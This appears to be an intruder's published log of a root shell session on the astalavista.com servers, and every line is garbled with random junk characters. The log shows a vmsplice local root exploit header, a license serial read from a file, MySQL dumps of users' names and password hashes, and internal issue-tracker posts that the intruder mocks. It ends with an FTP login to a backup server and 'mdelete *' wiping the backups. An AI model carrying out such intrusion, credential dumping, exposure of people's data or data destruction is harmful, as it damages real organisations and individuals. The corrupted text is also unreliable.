- v' d- i- d: t3 ~-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc3 l5 c, O& v- a& q! q
drwx–x–x 3 com com 4096 Jan 29 2008 domains
' C. D6 w$ s+ J- C! `: d" R" y8 N' `-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed0 o% _. E5 a6 P& M, y, \3 A
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap# v6 g/ U% {, b! i1 B" H
-rw——- 1 com com 69 Nov 18 2008 .lesshst0 H4 N. H8 v A% E
drwx—— 2 com com 4096 Sep 24 2007 mail
: }. T/ y* ^! |3 i! S1 {6 }-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history" g( a' s" ?7 c- F
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
4 U' o9 F9 k% f- f' `6 ]lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html; Z; C$ }% A0 O. T& t$ `
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow! Z4 b: I4 _$ |: r5 l
drwx—— 2 com com 4096 Aug 26 2008 .ssh% B# X( Y0 \) U9 U" R- M( N
-rwx—— 1 com com 8515 Feb 10 2008 t
# v1 z- ^: }+ {% E( A# A" X& n-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c1 Y- K( W" j1 B) n, d/ j( b
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
$ x, I. f. Y% a' n: u" J1 x {-rw-rw-r– 1 com com 617 May 20 2008 .toprc" e- ~' C" [% K3 Z9 N0 X; c2 v3 d" n
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
4 w( p: R4 h1 ~. }8 p6 t' K, l5 y-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
1 y' ]& e9 ?4 u$ a( K7 @-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
7 E; T1 h3 A5 h- c4 W& k" q: ?3 \8 G7 R/ v+ V
sh-3.2# head t.c" Q9 j" ?1 o! q
/*5 x/ F2 M* k6 o/ J1 `) X
* jessica_biel_naked_in_my_bed.c0 v+ G4 p. o! V z6 |
*' J7 V. H0 D4 t$ U( [" D7 z
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
7 n9 y6 g: j( x! X9 j8 N* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
4 ^. {% C |1 z/ U* Stejnak je to stare jak cyp a aj jakesyk rozbite.
' |* V( Q5 {! r* ^*2 I+ b$ Y8 r6 U T9 H5 Y6 g, z" k- L
* Linux vmsplice Local Root Exploit
9 S. C' |& t$ m2 V* By qaaz
8 s( o% ?! h5 [( k*& e) q7 O$ ^) X P. U" }
9 }% ?8 T- y( g' O" P5 Ish-3.2# cd /
7 w- M1 O* m, _: q$ q" e& Csh-3.2# ls -la
7 G/ n+ L" d8 `4 Btotal 360: Z- d: d5 N9 k8 c1 A
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .- X$ M+ X! b/ g: I+ k6 R/ I1 I% _
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..) @- M# S8 s( P) i1 H9 p
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group5 k. c+ @( E/ \
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user7 K1 `( U3 S2 a7 A
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db7 O1 S& m' J& k/ {3 O1 a/ `
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
7 c! U1 D+ x$ o5 k-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
+ r6 [( I( N" Z. X/ k( P( q: \: tdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup) f) H% r4 z4 _# U* F! @. q7 k
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
; h" ]/ f. y7 b3 P8 e( e! n7 ddrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot' \& k( x" n& W
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
/ D1 P0 ~' \3 M( w, g6 Fdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
. z# J& J' D8 q# q; sdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home, N) b! ]( E. h4 p
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
; S) b: C( q _3 K6 F) P: X6 X$ Rdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib2 _& D% l; Z: ^0 ]1 x/ D1 S3 P. U
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
3 q. C6 Z7 z* _8 v: Y$ {9 |drwx—— 2 root root 16384 Sep 11 2007 lost+found! i9 O1 p) X0 n: b
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media$ e* u! @! _/ S( ]% g
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
6 _! l2 S$ }! cdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
2 j! a9 _ G7 t3 z4 U2 s& E6 C6 K-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
% |8 g* t5 y9 b: F) Mdrwxr-xr-x 2 root root 0 Jun 3 02:43 net
# r* ]$ }2 t- K2 [6 c! [drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
4 u$ s' ?6 A- O9 p% T' `5 M8 S+ adr-xr-xr-x 264 root root 0 Jun 3 02:42 proc' h: f( ^- S$ d Q( ]- T0 H H
drwxr-x— 15 root root 4096 Jun 4 08:40 root
( i' }: {' `! r7 t/ zdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
% h" n! D9 C* u0 Y3 X5 ddrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
. C* z* R( `* E3 W* {drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
7 L2 U- R& B6 m4 ]drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
" W! _' R8 {6 p7 i9 y, adrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
6 g( A: e5 ?3 |8 r& jdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
K9 i; r7 K) rdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
/ E0 K! d3 w% u9 r" P# v
" r; E: a, J, |- d$ H! z+ W ksh-3.2# cd opt* C4 W$ l9 t7 I5 }2 e* v
sh-3.2# ls -la X- |7 J! C( Y7 O h
total 20$ v* L% L' s: ]- ]3 t# `6 h
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .4 l* q/ s% M0 s1 h3 I
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! @. ?& J7 J) W& _4 T, ~
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws( V6 Z. m: K% O- L' d7 ^3 L" r- G
# ]& ]( y9 }$ C; U% v p, vsh-3.2# cd lsws/
$ ~ d9 O1 {9 esh-3.2# ls -la
, w# l; P- d$ ztotal 108
4 I% `' ^* q0 p4 t# G# Y7 u! {drwxr-xr-x 15 root root 4096 Mar 20 2008 .6 h8 y8 S8 V' i" ~
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
/ F. P9 Y. ~. ~# Z; n( ddrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
; L! I2 ?6 ` j- u# g9 Gdrwxr-xr-x 13 root root 4096 May 29 15:10 admin y5 i# S( @1 x' {& m3 i. h
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate2 ^9 ~& G1 I' i1 A) u6 }# P
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
& \+ F/ g7 z/ e/ G" Q7 J3 Y7 W7 ydrwx—— 4 apache apache 4096 Jun 3 02:43 conf
5 R* w" J+ ~, p$ F* e# Fdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT8 {2 T6 a6 j ^# c# C/ |
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs+ s; b& t) u; T# c( u- @- J" ?) K
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
8 I7 i" j2 ]7 S6 f. Odrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
8 U2 X6 R; T- E- Q' {# v-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
7 k, l. A" e; d& t4 d. l( Z, C) O-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
: i6 s& O3 z* K* y-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL0 @' U8 Y% \8 t# a
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP- h! Q' K: K4 S% z
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
3 j: L- q' c7 B; x2 mdrwxr-xr-x 2 root root 4096 Mar 20 2008 php/ X- D1 l( m7 y/ V. _; t: J5 U
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
0 `2 u, A, I4 G8 l# Qdrwxr-xr-x 3 root root 4096 Mar 20 2008 share3 l' J* Z" q2 c8 a4 J {
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
0 V/ p4 ]9 K. W: u' u. p; c$ t; h. v' @/ \# `
sh-3.2# cd conf2 B- A$ m/ U* K* k7 w
sh-3.2# ls -la+ A! ]. d4 J% K3 K
total 48
# B k$ v5 _8 s4 g, kdrwx—— 4 apache apache 4096 Jun 3 02:43 ., P* J6 ~ A$ {: a/ h
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..: d4 u5 c$ O6 g) I
drwx—— 2 apache apache 4096 Mar 20 2008 cert5 [9 \/ T* Q7 y1 G- H7 S2 L5 i3 m
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
" i1 U/ E4 v! S& {% h-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
5 |" d+ b' y8 d1 l% u-rw-r–r– 1 root apache 0 Jun 3 14:11 .last- m# ^( \+ t+ v$ s k- O' W
-rw——- 1 apache apache 256 May 29 15:10 license.key
! O9 _5 B, B6 l0 F% \8 G+ d/ c-rw——- 1 apache apache 256 Mar 21 2008 license.key.old+ @# T. y8 f3 r
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties" ]* _1 h/ {; J( W$ B3 `
-rw——- 1 apache apache 20 May 29 15:10 serial.no, x9 J3 _- C+ ]( k
drwx—— 2 apache apache 4096 Mar 20 2008 templates
$ ~1 f9 j# M F& Z9 T' a" i; y2 N/ I8 L/ ~3 [+ a
sh-3.2# cat serial.no
' X9 `9 C2 ]. M% c8 oIbDl-oVsO-CKqL-wVRa2 i7 b1 ?: Z; [( g1 E
- ]( h2 K/ C& H- o- P" qsh-3.2# mysql, j9 j, X2 u3 I8 {: f% `
Welcome to the MySQL monitor. Commands end with ; or \g.
5 E" Y# W. \" F' T; y8 O) G `Your MySQL connection id is 286844
/ g Q+ h! Q! J; J. K: }Server version: 5.0.45-community-log MySQL Community Edition (GPL)
& O6 Y$ k$ s% ~5 Y9 d8 n1 Z- {1 U; A3 B% Y
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
0 `0 P; i( q3 I. T7 B' h
$ t$ v: o6 S0 u. u% B( D- bmysql> show databases;
# l# N( Q: y6 P- L% g+———————–+
' C; h6 _! E/ T4 m8 l% S| Database |
b( d& W% B8 z9 d+———————–+
2 [$ r/ b g0 G0 N| information_schema |4 s+ {- ]( p8 ?& b( T: `
| astanet_ads |6 h; `- U$ D- y
| astanet_mailing_lists |3 d% Y J+ V& z4 R
| astanet_mediawiki |
' C2 ~. g& g: ?. m1 m% }| astanet_membersystem |
F+ X6 A8 |' }. j0 D; }6 U2 X/ c| com_contrexx |
8 t* Q7 ]3 N4 x| com_contrexx2 |% g% m; n% Q/ y/ R, z9 S/ Y# I
| com_contrexx2_live |- G- K# o: E2 d- w2 ~
| da_roundcube |# n7 ?9 Q* o& E: Z" X) ?) L
| dolphin |
$ P) ]4 z4 e# K) K6 d) h p| ideapool |
+ M0 _0 r- _0 d. J| mysql |4 O, t5 X( J8 Q! V% r
| test |8 e; a9 Q) K) [8 @! D2 u" X
| yourmaster |8 E, h1 E: F- l- f% g# h
+———————–+
2 p4 m! f1 E$ @14 rows in set (0.00 sec). z2 v4 [$ F0 q/ k# ^4 I
) D2 ], F6 h; H1 D1 `% P7 C* t( k
mysql> use ideapool
, l: T' X1 Z! d: ~Database changed
, [/ r8 v% L! S6 ^* j' ~mysql> show tables;1 O7 a( @7 M8 N! R, M8 y- y
+———————————–+
4 B' ^! _* ]' ?% B, O+ ]| Tables_in_ideapool |, h4 w$ v7 b M+ ]' a
+———————————–+
% e: r8 ?* J$ m9 x| eventum_columns_to_display |0 b6 F/ p2 \% n
| eventum_custom_field |# n% M5 r9 D+ W# \2 y Q
| eventum_custom_field_option |
% y# _# W6 r$ \0 L$ e$ E) L+ G( U" V9 M| eventum_custom_filter |
4 @; c% E) ]9 o/ C/ c0 A4 d| eventum_customer_account_manager |; _ m- U( a* w" Q, I
| eventum_customer_note |* ]4 \% Z0 ?1 h8 [) x+ ?; O6 T
| eventum_email_account |1 l; ^9 l; _4 V8 c3 y5 M
| eventum_email_draft |
4 M: n9 S1 m! h s" n( \) V| eventum_email_draft_recipient |7 c* O4 u- T W8 C/ i6 R( @" [
| eventum_email_response |9 w/ X+ G8 `& e
| eventum_faq |
1 S% g f2 k, j+ F: k| eventum_faq_support_level |
" q. ~3 o4 x" ~1 x| eventum_group |2 b, I9 `/ Y7 C
| eventum_history_type |
: K" g8 K* u! v3 s6 U- _ N| eventum_irc_notice |
: s' d J( N8 m, ]9 v| eventum_issue |
- i* r* p* \: h! K3 I| eventum_issue_association |
* S5 {3 l' o: m| eventum_issue_attachment |2 f' q L) U Q% i6 R" D1 A( R
| eventum_issue_attachment_file |% ?6 V0 H8 [0 G
| eventum_issue_checkin |
. I" v8 N) s1 V3 ?" y4 D# n) e+ F3 F" l| eventum_issue_custom_field |' U+ y9 A, e7 U7 O5 k, ~2 o! O
| eventum_issue_history |
4 T2 @$ d2 W; O| eventum_issue_quarantine |8 a f: S, L$ _
| eventum_issue_requirement |) m) ~! \$ x" }- G- b6 i& s3 Q
| eventum_issue_user |; y. S- v' v; s4 Z
| eventum_issue_user_replier |
: S% t. W; t- }7 `0 P+ k| eventum_link_filter |/ c* b( c9 T# ^. x( D
| eventum_mail_queue |
3 t" [0 a* r- C- Q# ~| eventum_mail_queue_log |
7 l7 {6 x) n% r' Z5 {3 z$ [7 L, ~) ?| eventum_news |& A" b3 f/ Z! |5 p3 x
| eventum_note |* |1 e i: _- k, R0 V9 _( ~9 s
| eventum_phone_support |
8 S* j1 n$ c. ^1 ?6 F| eventum_project |
( V# j9 K" Q" ?! E/ a' C! Z| eventum_project_category |
0 V/ S, b+ b- {! g' v9 ]| eventum_project_custom_field |
1 _+ F) x1 i5 V( `4 U, `' T; C| eventum_project_email_response |* F' t* J# |, K# A
| eventum_project_field_display |
" i9 l; X; {9 Q. G" B; K& c| eventum_project_group |" G! D" n0 T( S0 d f' U0 v! Y5 Q
| eventum_project_link_filter |% w9 g# a7 c# k3 y
| eventum_project_news |# r3 A& V0 q* c
| eventum_project_phone_category |8 W* P9 m4 R! X& t
| eventum_project_priority |
; p7 X3 x% A0 q, h+ Q7 k| eventum_project_release |5 [+ p1 ^( }( J3 h- v. b! D
| eventum_project_round_robin |
9 v; p$ p0 }5 b# y# m| eventum_project_status |0 u( @8 ~' V2 x( C" U) i+ F' z
| eventum_project_status_date |
0 U6 `6 Q* o5 q| eventum_project_user | z+ t4 t7 ]% d0 O6 [( b
| eventum_reminder_action |
% M3 y5 X/ V7 [, W4 T| eventum_reminder_action_list |7 r$ e `, c4 X
| eventum_reminder_action_type | {( x, o- J: J0 m7 c+ H" Z8 \
| eventum_reminder_field |
( k- S9 w' |2 Z( l. E* C" r0 s) d| eventum_reminder_history |# A( ?8 z% {6 x
| eventum_reminder_level |
+ e8 L; H1 U! z$ h# A1 Q% Z; |0 D- H| eventum_reminder_level_condition | c' h3 h, A# Q: B
| eventum_reminder_operator |) Z* P( r( J9 u0 F6 O
| eventum_reminder_priority |
$ U+ k1 V8 V P2 v| eventum_reminder_requirement |# y' ~" b4 s" K% u* U( J, W
| eventum_reminder_triggered_action |
+ N2 Y8 E; b& c9 h5 ~ j| eventum_resolution |7 y$ O/ m. ~2 z0 @! X I1 o3 h
| eventum_round_robin_user |8 M% ^7 U4 }! K; I6 `
| eventum_search_profile |3 w/ _9 P" i, [1 C8 I
| eventum_status |
. ^! Y9 B' U) [| eventum_subscription |
9 X3 N) C/ X9 S| eventum_subscription_type |7 ?4 m. K9 h9 U/ f7 s$ f5 `
| eventum_support_email |
+ q0 k: t% c$ S, P1 V3 T z$ H| eventum_support_email_body |
@6 M7 Q1 P! F| eventum_time_tracking |
( g: V, {9 N0 z| eventum_time_tracking_category |* G9 g8 x" |' q) ^4 x. Q2 |
| eventum_user |
. Y' f! ~# A$ e+———————————–+0 [% A7 @1 u$ o4 ?3 M/ y7 X+ I6 ?
69 rows in set (0.00 sec)( l0 n5 }- y$ b
, U# T9 X% `( E+ P& j" V1 v
mysql> describe eventum_user;" x& e3 s3 B( v2 @
+————————-+——————+——+—–+———————+—————-+
- q' N1 p, Q. O& o! v/ r5 d1 I1 Z. \| Field | Type | Null | Key | Default | Extra |1 O' m" b$ X! [0 a$ }$ h
+————————-+——————+——+—–+———————+—————-+6 e0 L" T, _3 R+ p* d
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
' y; l: L& c7 G| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
0 A/ h$ |/ O6 i7 t& j% _| usr_customer_id | int(11) unsigned | YES | | NULL | |5 f- M3 {/ g. F. j1 Y/ y, U% j
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |7 z$ r( b C3 {3 x
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |5 H$ [/ c( n1 [+ |# ]; u
| usr_status | varchar(8) | NO | | active | |& s/ C3 I C. |: F/ `5 A" p' S+ ?# d, f
| usr_password | varchar(32) | NO | | | |
9 `" z5 M3 k9 p" b! J$ q/ S| usr_full_name | varchar(255) | NO | | | |$ i% t/ n7 s. j, V4 M, C$ w
| usr_email | varchar(255) | NO | UNI | | |2 m# ^8 G' G) g
| usr_preferences | longtext | YES | | NULL | |
% R4 M1 Z" S$ ?+ i% _6 ?$ r4 ~| usr_sms_email | varchar(255) | YES | | NULL | |
4 x; [% U* t! w| usr_clocked_in | tinyint(1) | YES | | 0 | |
6 H7 X8 m/ f Z/ [4 p| usr_lang | varchar(5) | YES | | NULL | |
9 ^* `4 }4 \; E+————————-+——————+——+—–+———————+—————-+& P1 G' _( M' Z, j1 K/ F
13 rows in set (0.00 sec)
$ O8 U0 B+ N, ^/ g( z* R) I, {
/ k8 K: |- y" X* Dmysql> select usr_full_name,usr_email,usr_password from eventum_user;
% V# T) {0 F9 w9 V# t- F( n% V+———————-+——————————-+———————————-+
; B9 Q9 y6 ?1 b% [5 ]| usr_full_name | usr_email | usr_password |3 T) v+ X7 Y |# ~4 F% n. ?
+———————-+——————————-+———————————-+* G, C' [, `) {" J* H! c
| system | 链接标记[email protected] | 14589714398751513457adf349173434 |
' a+ ^! P$ N, Q# C& J2 Q' B0 Y| Developer (Paulo) | 链接标记[email protected] | 26a35a1cf8895c27fb37ef4cf149f7bb |4 ^* u/ m3 P& J) [! K5 k" Q/ I# _
| Be1er0ph0r | 链接标记[email protected] | 229766dc0ca1fb67160a8782321dfdce |
' K$ q! n* B8 }8 P5 B" m| Admin | 链接标记[email protected] | 57c2877c1d84c4b49f3289657deca65c |
6 E6 X3 {) I9 O5 C- h# k3 ~| ADMIN | 链接标记[email protected] | f6fdffe48c908deb0f4c3bd36c032e72 |. K. x5 n' S: ^# s+ h; _
| USER | 链接标记[email protected] | 5cc32e366c87c4cb49e4309b75f57d64 |
+ g6 x3 G2 l0 V1 A2 Q/ p; Q0 F; C2 D# V| Glafkos - (nowayout) | 链接标记[email protected] | f7735ab119023a8abb2301e67f81cd67 |
2 k% z- {! {; `: h7 r- r9 Y| Joao | 链接标记[email protected] | f805c071d7c823b937448c54c047b9fd |
, H3 A2 T) ^# q+ F$ G| Pascal | 链接标记[email protected] | e10adc3949ba59abbe56e057f20f883e |' k! T0 G3 q: s0 t# z
| commander | 链接标记[email protected] | 932cd250918f881d41feb0b93883a926 |
8 {6 O( Q! O9 ]) w8 W% Q7 R| ishtus | 链接标记[email protected] | a587ffc88b3dbbba3fd2fe67af649ff0 |
7 O( i8 r7 E# C+ {: o0 Z8 H| sykadul | 链接标记[email protected] | 20224a2f3eeb57a13a10b4df543c128e |* q! S( P0 W+ v4 X& C. G6 O2 k
| Zach McElroy | 链接标记[email protected] | 33c5d4954da881814420f3ba39772644 |$ H5 L) q7 x6 N I4 x
| usb | 链接标记[email protected] | b513f22c3db6932855ad732f5f8a10a2 |( M9 G p2 g, u4 I% \, y
| cyph3r | 链接标记[email protected] | 6e1e50017a945e874d52ec91f9ab2cee |
( G, l: L" A8 o6 {+———————-+——————————-+———————————-+1 B, h4 \- ^9 O% K, M
15 rows in set (0.00 sec)
* w1 G5 _8 p0 X% n8 m
: N; V' M) U! P4 b5 i4 O8 gmysql> select iss_description from eventum_issue where iss_id = 43;
' I5 }! p5 `4 f7 f1 a L* A, D) W- k+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+& W. o+ a) K( d0 }; p
| iss_description T& v& _3 ], R
|% P8 B; S0 o: v2 c4 {
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+' t6 q7 o. O$ w4 C. G% ~$ w8 ^$ E" ]
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
% i( k& l% u1 _% _connected for 90 mins… 120mins… so what i propose is something like:
# a9 ]( J5 i" z7 O链接标记[url]http://www.surfthechannel.com/[/url]" l% G( ~; D) ?$ ~1 z9 @5 R
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
! s2 j, g/ v2 Blike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t( C+ V+ F% w2 P1 r
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
1 D; H; w4 B5 z% u- n3 j. Pif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
, ^0 P- ]% o, v. ~0 n1 J* t' z! B- {! ~0 Y
We could also put advertisement during play on the flash video player itself… extra $$…4 \3 E$ m2 I; _. V1 v
7 v4 u- o$ Y. c6 w; E
By sykadul |2 S/ L. }( v) O$ x) W0 E& h2 e
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+' a2 \4 Y7 R W
1 row in set (0.00 sec)
. O: @3 q5 N1 w- D! E9 r5 z' q& Q/ @# L( F! y# ~4 I% e; N: {$ _! }
// Money and extra $$ is all they care about. remember that.* I- ~' D J8 x3 Z, C
9 X$ w$ ^* h$ b. Kmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;+ J/ P$ g& }% c
+————————+——————————————————————————————————————————————————————————————————————————————-+
9 ]9 J9 R+ \% C| iss_summary | iss_description
. R) G$ b- a! }$ l|( U4 p( x W- ^5 c& Q$ c. v
+————————+——————————————————————————————————————————————————————————————————————————————-+
, M8 p! P7 g$ ?# `3 h8 w1 H' E9 Q2 N5 [1 F| Forum for REAL EXPERTS | Hello,- j6 C8 V0 q- k4 |3 i7 G
0 H; W4 h& x& YIshtus and I,
x7 I" @0 n1 l% v% {+ f! d+ A
) ~. q% ]# j: V. e rCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide! J# c$ m& {0 V6 S
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..8 D3 t) e+ I; V! F
( l( F. s# G N; x! b5 W0 a5 WOne example a friend of mine from coresecurity.com!& T2 _2 C4 E2 Q0 r0 J
5 v/ `: |- H5 \! U# vWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc.." ^# C5 |& X& s9 H4 q
$ q5 b! \1 v3 r|
2 } D3 b+ w7 n; B' V7 t7 _+————————+——————————————————————————————————————————————————————————————————————————————+
( {3 h0 ^) |9 N5 s3 p6 ~1 row in set (0.00 sec)
+ ^$ `" a) |0 V; V" O2 R! F) K1 ?4 M
* o, x3 t+ J4 }& N9 P// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…, V) _5 O. Q4 k0 t: f
# ?/ W. v& J& {1 l( `mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;1 N) Z- V* L/ V
+——————+———————————————————————————————+ y# q2 g7 h9 a* R" k
| iss_summary | iss_description |
: y' c- G: m6 A' g: q+——————+———————————————————————————————+
& q- N% w( ~' i. K( U% a% m| Website guidance | Virtual Girl which guides you trought the website.. f5 _3 c% I% U+ ~- ?
; y8 }( w a( S; c+ \2 o* F; y! |We need a girl with who you can ( talk )!!!
& q9 @- K- S, Q" B6 A# yAlso for the News!
1 ~! i7 x2 r& _% }7 L2 O/ l* }; @So my suggestion is a girl who read you the news loud if you like!' o9 D) u1 i& X0 ?6 y- N3 g- F
you can choose between read yourselfe or she read it for you or both!& V4 B- i+ v$ |; N7 \. q& l; ^
/ `% m& r0 o: S8 w, s
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
; I8 L, i7 p7 I
- F' `8 W4 d6 pHave a look on the example girls!!
, v1 ?% j2 L" m6 p- C7 m5 H6 l0 t( ~6 v0 K; L6 h- i. V
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]+ {7 [+ {2 g, K, `( n9 ]; l
( v$ o$ W, b7 _
or that: v% V/ X) ~* a2 w
$ V# c6 D, Q* ]4 l! b' Z$ c链接标记[url]http://www.yellostrom.de/[/url]5 j+ H: r/ p" q6 u
: Q& e, {' j! i1 d3 b0 K* n|
& K% a7 N# o8 O( m0 O& l+——————+———————————————————————————————+
: u% _" m* n# ?1 row in set (0.00 sec)+ O0 n( Z; j3 z, e' _- z" [
, Z5 c0 q) o: e9 h1 \( b9 g
// ha ha.5 D2 h2 H& f3 Q
+ _! r. o; x8 |% l S6 ~
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;% V. _+ o7 T3 Y! E. q u1 P
+————————–+———————————————————————————————————–+; T! Q. r2 a: U- N/ Z3 }6 X7 y h
| iss_summary | iss_description |
2 u+ W1 u+ ~. B9 c+————————–+———————————————————————————————————–+
1 w8 I% e) Z! g' z$ `| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
4 k$ K$ }1 C7 u( U0 E* f& t1 A+————————–+———————————————————————————————————–+
: O$ _! j( ^3 n; n6 i& E9 T1 row in set (0.00 sec)6 V) c+ Z+ V* }8 a0 L% @; K3 Y
3 W5 v! i8 U2 w! r" `
// LOL.
8 m! h) Y* m+ d7 g. Z7 C( G9 k1 y- M# ~" a+ Y1 z3 ]+ w; M# q
mysql> exit' X3 f( B c" m
Bye
" A/ |% ~. ^/ [0 `# I) {! j% n2 `0 V7 r: f3 y" R5 ?
sh-3.2# ftp 212.254.194.163- c @) v8 \) G8 ^& ^
Connected to 212.254.194.163.+ X+ w, C+ m9 q1 k8 E
220 BackupCOM_VW FTP server ready.
% A" A* q. C& H% m2 j% |504 AUTH: security mechanism ‘GSSAPI’ not supported.% V' r, c/ u" |- N
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
' n; g& I$ U2 x# wKERBEROS_V4 rejected as an authentication type4 j& \% H: A. g) x* L+ A5 n
Name (212.254.194.163:root): astalavista.com4 S8 a. _% @( b' x4 P
331 Password required for astalavista.com.( R& H% n8 U5 U1 k6 |8 o! j
Password:- }9 @. U8 @" S8 a) L
230 User astalavista.com logged in.
% f: I6 b5 }" Y) |1 GRemote system type is UNIX.
0 c3 D, q! `5 v0 [: lUsing binary mode to transfer files.
L: e( C* V" x; _$ B, hftp> ls -la2 |0 z4 D) N1 |( K% U# c
227 Entering Passive Mode (212,254,194,163,2,188)
% l# q% ^1 e3 e2 _150 Opening BINARY mode data connection for ‘file list’.' x+ _( C6 b; c
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
0 V0 e9 A6 x+ \; O; W9 E+ w G226 Transfer complete.
3 _/ \% {3 [6 iftp> cd astalavista.com9 H: W2 n% T, B" k4 {1 E, b# R+ ?
250 CWD command successful.% i+ R+ R+ L8 v0 K8 e" M" ?8 G- W: e
ftp> ls -la; H+ u" q7 L- f" ]. {
227 Entering Passive Mode (212,254,194,163,2,189)
* F7 P6 u" Y. l. T# o150 Opening BINARY mode data connection for ‘file list’.: V0 F& @8 L& a7 ^) k, z8 \8 l
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
2 @! k+ d- q% \-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
~- m% u% F! X0 o# ?-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
# b2 I/ _' [: p' \0 |& B) T3 D# `-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
, l) ]: e0 z, U-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
( i4 l% p, l3 ]8 a8 n6 k/ R/ ~" X[snip]
+ g8 d* a7 y5 r% `8 |( ^+ l226 Transfer complete.
w2 g- J: i8 dftp> mdelete *
" t8 f& G5 ~! L; C1 U( Xftp> ls -la
